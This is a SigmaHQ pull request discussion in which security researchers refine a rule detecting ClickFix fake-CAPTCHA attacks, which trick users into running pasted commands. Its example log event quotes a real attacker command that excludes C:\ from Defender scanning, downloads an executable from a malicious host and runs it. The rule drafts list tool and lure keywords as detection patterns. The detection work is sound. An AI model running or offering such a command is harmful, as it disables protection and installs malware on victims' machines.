SigmaHQ
Adding rule for detecting recaptcha phish process executions
Summary of the Pull Request
Adding rule for detecting recaptcha phish process executions
Changelog
New: proc_creation_win_powershell_fake_captcha.yml
Example Log Event
cmd /c "powershell Add-MpPreference -ExclusionPath 'C:\' && timeout 2 && powershell Invoke-WebRequest -Uri 'http://book[.]rollingvideogames[.]com/temp/1.exe' -OutFile '%TEMP%\1.exe' && start %TEMP%\1.exe" # ✅ ''I am not a robot - reCAPTCHA Verification ID: 1212''
Reference: https://www.zscaler.com/blogs/security-research/deepseek-lure-using-captchas-spread-malware
Fixed Issues
N/A
SigmaHQ Rule Creation Conventions
- If your PR adds new rules, please consider following and applying these conventions
Hi I have observed others patterns among malware abusing this clickfix technique and adjusted @montysecurity 's rules accordingly. His rule was slightly incorrect as well because for log event given in his example, the image will be cmd.exe for parentimage explorer.exe not powershell.exe.
Thats why i added them on commandline not on image just to be safe
proc_creation_win_susp_clickfix_execution_pattern.yml
title: Potential ClickFix Execution Pattern
id: d487ed4a-fd24-436d-a0b2-f4e95f7b2635
status: experimental
description: |
Detects potential ClickFix execution patterns leveraging social engineering techniques where users are tricked into running malicious commands via clipboard manipulation.
This attack starts with users visiting malicious websites, often impersonating legitimate news or service platforms.
These websites display fake CAPTCHA challenges labeled as "I am not a robot - reCAPTCHA Verification," instructing users to press Windows + R, paste clipboard contents into the Run dialog, and execute the command.
The clipboard content typically contains mshta.exe or powershell.exe commands that download and execute malware, such as Lumma Stealer or other information stealers.
This technique exploits user trust and bypasses traditional malware defenses by relying on user interaction.
references:
- https://github.com/JohnHammond/recaptcha-phish
- https://www.zscaler.com/blogs/security-research/deepseek-lure-using-captchas-spread-malware
- https://www.threatdown.com/blog/clipboard-hijacker-tries-to-install-a-trojan/
- https://app.any.run/tasks/5c16b4db-4b36-4039-a0ed-9b09abff8be2
- https://www.esentire.com/security-advisories/netsupport-rat-clickfix-distribution
author: montysecurity, Swachchhanda Shrawan Poudel(Nextron Systems)
date: 2025-03-04
tags:
- attack.execution
- attack.t1204.001
logsource:
category: process_creation
product: windows
detection:
selection_parent:
ParentImage|endswith: '\explorer.exe'
selection_cmd_1:
CommandLine|contains:
- 'I am not a robot - reCAPTCHA Verification'
- 'Verify you are human - Ray Verification ID:'
selection_cmd_2:
CommandLine|contains:
- 'mshta'
- 'powershell'
# Add more potentially suspicious executables used for malware download/execution
condition: all of selection_*
falsepositives:
- Higly unlikely
level: high
cc @nasbench , @frack113
Hi I have observed others patterns among malware abusing this clickfix technique and adjusted @montysecurity 's rules accordingly. His rule was slightly incorrect as well because for log event given in his example, the image will be cmd.exe for parentimage explorer.exe not powershell.exe.
Thats why i added them on commandline not on image just to be safe
proc_creation_win_susp_clickfix_execution_pattern.yml
title: Potential ClickFix Execution Pattern id: d487ed4a-fd24-436d-a0b2-f4e95f7b2635 status: experimental description: | Detects potential ClickFix execution patterns leveraging social engineering techniques where users are tricked into running malicious commands via clipboard manipulation. This attack starts with users visiting malicious websites, often impersonating legitimate news or service platforms. These websites display fake CAPTCHA challenges labeled as "I am not a robot - reCAPTCHA Verification," instructing users to press Windows + R, paste clipboard contents into the Run dialog, and execute the command. The clipboard content typically contains mshta.exe or powershell.exe commands that download and execute malware, such as Lumma Stealer or other information stealers. This technique exploits user trust and bypasses traditional malware defenses by relying on user interaction. references: - https://github.com/JohnHammond/recaptcha-phish - https://www.zscaler.com/blogs/security-research/deepseek-lure-using-captchas-spread-malware - https://www.threatdown.com/blog/clipboard-hijacker-tries-to-install-a-trojan/ - https://app.any.run/tasks/5c16b4db-4b36-4039-a0ed-9b09abff8be2 - https://www.esentire.com/security-advisories/netsupport-rat-clickfix-distribution author: montysecurity, Swachchhanda Shrawan Poudel(Nextron Systems) date: 2025-03-04 tags: - attack.execution - attack.t1204.001 logsource: category: process_creation product: windows detection: selection_parent: ParentImage|endswith: '\explorer.exe' selection_cmd_1: CommandLine|contains: - 'I am not a robot - reCAPTCHA Verification' - 'Verify you are human - Ray Verification ID:' selection_cmd_2: CommandLine|contains: - 'mshta' - 'powershell' # Add more potentially suspicious executables used for malware download/execution condition: all of selection_* falsepositives: - Higly unlikely level: highcc @nasbench , @frack113
You do not need the CLI for the binaries as the captcha strings are enough.
@nasbench , @frack113
See this,
https://app.any.run/tasks/61fd06c8-2332-450d-b44b-091fe5094335/?utm_source=twitter&utm_medium=post&utm_campaign=fake_booking&utm_term=060325&utm_content=linktoservice
https://x.com/anyrun_app/status/1897651321462784280
I guess, We also need to add 'I'm human ID' in the commandline
or like try to think more genericly
@swachchhanda000 what about something like this? going for the more generic approach
title: Potential ClickFix Execution Pattern
id: d487ed4a-fd24-436d-a0b2-f4e95f7b2635
status: experimental
description: |
Detects potential ClickFix execution patterns leveraging social engineering techniques where users are tricked into running malicious commands via clipboard manipulation.
This attack starts with users visiting malicious websites, often impersonating legitimate news or service platforms.
These websites display fake CAPTCHA challenges labeled as "I am not a robot - reCAPTCHA Verification," instructing users to press Windows + R, paste clipboard contents into the Run dialog, and execute the command.
The clipboard content typically contains mshta.exe or powershell.exe commands that download and execute malware, such as Lumma Stealer or other information stealers.
This technique exploits user trust and bypasses traditional malware defenses by relying on user interaction.
references:
- https://github.com/JohnHammond/recaptcha-phish
- https://www.zscaler.com/blogs/security-research/deepseek-lure-using-captchas-spread-malware
- https://www.threatdown.com/blog/clipboard-hijacker-tries-to-install-a-trojan/
- https://app.any.run/tasks/5c16b4db-4b36-4039-a0ed-9b09abff8be2
- https://www.esentire.com/security-advisories/netsupport-rat-clickfix-distribution
author: montysecurity, Swachchhanda Shrawan Poudel(Nextron Systems)
date: 2025-03-04
tags:
- attack.execution
- attack.t1204.001
logsource:
category: process_creation
product: windows
detection:
selection_parent:
ParentImage|endswith: '\explorer.exe'
selection_cmd_1:
CommandLine|contains:
- 'robot'
- 'captcha'
- 'recaptcha'
- 'human'
- 'verify'
- 'verification'
selection_cmd_2:
CommandLine|contains:
- '#' # PowerShell Comment
selection_cmd_3:
CommandLine|contains:
- 'mshta'
- 'powershell'
- 'certutil'
- 'scrobj.dll'
# Add more potentially suspicious executables used for malware download/execution
selection_cmd_4:
CommandLine|contains:
- 'https://'
- 'http://'
condition: all of selection_*
falsepositives:
- Higly unlikely
level: high
Hi, after a brief research, I discovered that there are other forms of fake CAPTCHA messages being used in these lures. The '#' symbol remains a consistent element across all of them. Therefore, I made some adjustments by removing the suspicious executables to ensure the rule is not overly specific.
title: Potential ClickFix Execution Pattern
id: d487ed4a-fd24-436d-a0b2-f4e95f7b2635
status: experimental
description: |
Detects potential ClickFix execution patterns leveraging social engineering techniques where users are tricked into running malicious commands via clipboard manipulation.
This attack starts with users visiting malicious websites, often impersonating legitimate news or service platforms.
These websites display fake CAPTCHA challenges labeled as "I am not a robot - reCAPTCHA Verification," instructing users to press Windows + R, paste clipboard contents into the Run dialog, and execute the command.
The clipboard content typically contains mshta.exe or powershell.exe commands that download and execute malware, such as Lumma Stealer or other information stealers.
This technique exploits user trust and bypasses traditional malware defenses by relying on user interaction.
references:
- https://github.com/JohnHammond/recaptcha-phish
- https://www.zscaler.com/blogs/security-research/deepseek-lure-using-captchas-spread-malware
- https://www.threatdown.com/blog/clipboard-hijacker-tries-to-install-a-trojan/
- https://app.any.run/tasks/5c16b4db-4b36-4039-a0ed-9b09abff8be2
- https://www.esentire.com/security-advisories/netsupport-rat-clickfix-distribution
author: montysecurity, Swachchhanda Shrawan Poudel (Nextron Systems)
date: 2025-03-22
tags:
- attack.execution
- attack.t1204.001
logsource:
category: process_creation
product: windows
detection:
selection_parent:
ParentImage|endswith: '\explorer.exe'
CommandLine|contains: '#'
selection_cmd:
CommandLine|contains:
# Add more suspicious keyword
- 'account'
- 'anti-bot'
- 'botcheck'
- 'captcha'
- 'challenge'
- 'confirmation'
- 'fraud'
- 'human'
- 'identity'
- 'robot'
- 'validation'
- 'verification'
- 'verify'
condition: all of selection_*
falsepositives:
- Highly unlikely
level: high
cc @montysecurity, @nasbench , @frack113
OR we can be little bit more generic by looking at Explorer.exe as ParentImage and commandline containing 'http', a medium level rule. Let me know what you think?
title: Suspicious User-Initiated URL Execution via Explorer
id: df66b1ea-4ffe-4089-92b4-44d163b40d27
status: experimental
description: |
Detects instances where Explorer.exe spawns processes with command lines containing URLs.
This could indicate a user being socially engineered to execute commands via clipboard manipulation, such as in ClickFix or similar malware delivery campaigns.
It may also catch generic misuse where users are manually launching download cradles or scripts that reference external resources.
references:
- https://www.zscaler.com/blogs/security-research/deepseek-lure-using-captchas-spread-malware
- https://www.esentire.com/security-advisories/netsupport-rat-clickfix-distribution
author: Swachchhanda Shrawan Poudel (Nextron Systems)
date: 2025-03-22
tags:
- attack.execution
- attack.t1204.001
logsource:
category: process_creation
product: windows
detection:
selection:
ParentImage|endswith: '\explorer.exe'
CommandLine|contains: 'http'
condition: selection
falsepositives:
- IT administrators or power users launching trusted tools/scripts with URLs manually from explorer
- In-house tools that might pass URLs as arguments via explorer-launched processes
level: medium
Thanks @swachchhanda000 ! Given the target of the hunt being recaptcha, I like the first one you list there (Potential ClickFix Execution Pattern) better.
The second one is a good hunt as well, and yet I think it expands the scope a bit too far outside of recaptcha/clickfix. It definitely has some value though, so maybe as a separate rule?
I prefer to stay with the pattern :
selection_parent:
ParentImage|endswith: '\explorer.exe'
CommandLine|contains: '#'
selection_cmd:
CommandLine|contains:
# Add more suspicious keyword
CommandLine|contains: 'http' may have too many false positif
